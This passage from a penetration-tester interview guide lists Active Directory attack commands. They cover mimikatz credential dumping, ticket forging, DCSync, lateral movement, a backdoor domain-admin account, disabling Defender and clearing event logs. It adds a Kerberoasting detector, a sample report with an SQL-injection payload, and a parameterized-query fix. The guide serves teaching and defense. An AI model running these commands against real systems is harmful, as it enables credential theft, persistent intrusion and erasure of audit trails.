mimikatz # sekurlsa::logonpasswords

# Create silver ticket for specific service
mimikatz # kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /target:server.example.com /service:cifs /rc4:hash

DCSync Attack:

# Mimikatz
mimikatz # lsadump::dcsync /domain:example.com /user:Administrator

# Impacket
python3 secretsdump.py example.com/<user>:<password>@<dc-ip>

Lateral Movement:

# PSExec
.\PsExec.exe \\target -u domain\user -p password cmd

# WMI
wmic /node:target /user:domain\user /password:password process call create "cmd.exe"

# PowerShell Remoting
Enter-PSSession -ComputerName target -Credential domain\user

# RDP
xfreerdp /u:domain\user /p:password /v:target

Persistence:

# Create domain admin
net user backdoor Password123! /add /domain
net group "Domain Admins" backdoor /add /domain

# Golden ticket (long-term)
# Silver ticket (specific service)

# Skeleton key (Mimikatz)
mimikatz # misc::skeleton
# Now any user can authenticate with password "mimikatz"

Defense Evasion:

# Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true

# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Obfuscate PowerShell
Invoke-Obfuscation
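Interviewers for this topic increasingly ask how the attacks above look in domain-controller logs. The following added example (written for this guide, not from the original article) implements the two classic detections over constructed Security events: Kerberoasting as one account requesting RC4-encrypted service tickets (event 4769 with TicketEncryptionType 0x17, the ticket type `hashcat -m 13100` cracks) for many distinct SPNs in a short window, and AS-REP roasting as a TGT request (event 4768) for an account with pre-authentication disabled (PreAuthType 0). The event records, thresholds and names are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security events; field names follow the 4768/4769 event XML
SAMPLE_EVENTS = [
    # One account pulls RC4 (0x17) service tickets for six SPNs within seconds
    *[{"EventID": 4769, "TimeCreated": f"2025-11-25T10:00:{s:02d}", "TargetUserName": "jdoe@EXAMPLE.COM",
       "ServiceName": svc, "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.55"}
      for s, svc in enumerate(["svc_sql", "svc_http", "svc_backup", "svc_ftp", "svc_ci", "svc_mon"])],
    # Normal AES (0x12) service ticket request
    {"EventID": 4769, "TimeCreated": "2025-11-25T10:05:00", "TargetUserName": "asmith@EXAMPLE.COM",
     "ServiceName": "WEB01$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.23"},
    # TGT requested for an account that does not require pre-authentication
    {"EventID": 4768, "TimeCreated": "2025-11-25T10:06:00", "TargetUserName": "legacy_svc",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.55"},
    # Normal TGT request (PreAuthType 2 = encrypted timestamp)
    {"EventID": 4768, "TimeCreated": "2025-11-25T10:06:30", "TargetUserName": "asmith",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.23"},
]

def detect_kerberoasting(events, min_services=5, window=timedelta(minutes=5)):
    """Accounts that requested RC4-encrypted service tickets (4769, 0x17) for at
    least min_services distinct SPNs inside `window`; returns {user: details}."""
    by_user = defaultdict(list)
    for e in events:
        if e["EventID"] == 4769 and e["TicketEncryptionType"].lower() == "0x17":
            by_user[e["TargetUserName"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"], e["IpAddress"]))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _, _) in enumerate(reqs):
            in_window = [r for r in reqs[i:] if r[0] - t0 <= window]
            services = {svc for _, svc, _ in in_window}
            if len(services) >= min_services:
                alerts[user] = {"services": sorted(services),
                                "sources": sorted({ip for _, _, ip in in_window})}
                break
    return alerts

def detect_asrep_roasting(events):
    """TGT requests (4768) for accounts with pre-authentication disabled (PreAuthType 0);
    the AS-REP for such accounts is crackable offline, especially when RC4 (0x17)."""
    return [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
            for e in events
            if e["EventID"] == 4768 and e.get("PreAuthType") == "0"]

if __name__ == "__main__":
    print("kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
    print("as-rep roasting:", detect_asrep_roasting(SAMPLE_EVENTS))
```

The RC4 filter is what keeps the Kerberoast rule quiet on a healthy domain (normal clients negotiate AES), and the same two facts drive the fixes the report should recommend: long random passwords or gMSA for service accounts, AES-only service accounts, and no accounts with "Do not require Kerberos preauthentication" set.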

Rarity: Common
Difficulty: Hard


Reporting

10. What should a penetration testing report include?

Answer: Comprehensive reporting structure:

Executive Summary:

  • High-level findings
  • Business impact
  • Risk overview
  • Recommendations

Technical Details:

## Finding: SQL Injection in Login Form

**Severity:** Critical (CVSS 9.8)

**Description:**
The login form at /admin/login is vulnerable to SQL injection,
allowing attackers to bypass authentication and access the admin panel.

**Affected Asset:**
- URL: https://target.com/admin/login
- Parameter: username
- Method: POST

**Proof of Concept:**
```http
POST /admin/login HTTP/1.1
Host: target.com

username=admin' OR '1'='1'--&password=anything
```

Impact:

  • Unauthorized access to admin panel
  • Access to sensitive customer data
  • Potential database compromise

Remediation:

  1. Use parameterized queries
  2. Implement input validation
  3. Apply principle of least privilege to database user
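A good report pairs the proof of concept with the fix in code, since "use parameterized queries" on its own is often misread as "escape the quotes". The block below is an added example for this guide (not from the original article): a constructed in-memory SQLite login table, the string-built query that the PoC above bypasses, and the placeholder version that treats the same payload as plain data. The table stores the password in clear text only to keep the example short; a real system compares a hash.

```python
import sqlite3

def make_db():
    """Constructed in-memory users table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """String-built query: the client controls SQL syntax, not just values."""
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    """Placeholders keep the statement fixed; a quote in the payload is data, not syntax."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    conn = make_db()
    payload = "admin' OR '1'='1'--"          # the PoC payload from the finding above
    print("vulnerable   :", login_vulnerable(conn, payload, "anything"))
    print("parameterized:", login_parameterized(conn, payload, "anything"))
    print("real creds   :", login_parameterized(conn, "admin", "s3cret"))
```

Remediation item 3 (least privilege for the database user) limits what an injection can reach if one slips through elsewhere; it is a second layer, not a replacement for item 1.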

Rarity: Very Common
Difficulty: Medium


Conclusion

Penetration tester interviews require hands-on experience and deep technical knowledge. Focus on:

  1. Methodology: Structured testing approach, documentation
  2. Vulnerability Assessment: Risk prioritization, CVSS scoring
  3. Tools: Metasploit, Burp Suite, Nmap, custom scripts
  4. Privilege Escalation: Linux and Windows techniques, automation tools
  5. Web Testing: SQL injection, XSS, authentication bypass
  6. API Testing: REST/GraphQL security, authorization flaws
  7. Network Testing: Scanning, exploitation, lateral movement
  8. Active Directory: Kerberoasting, Pass-the-Hash, BloodHound
  9. Reporting: Clear documentation, business impact, remediation

Practice in legal environments (HackTheBox, TryHackMe), pursue certifications (OSCP, CEH), and stay updated with latest vulnerabilities. Good luck!
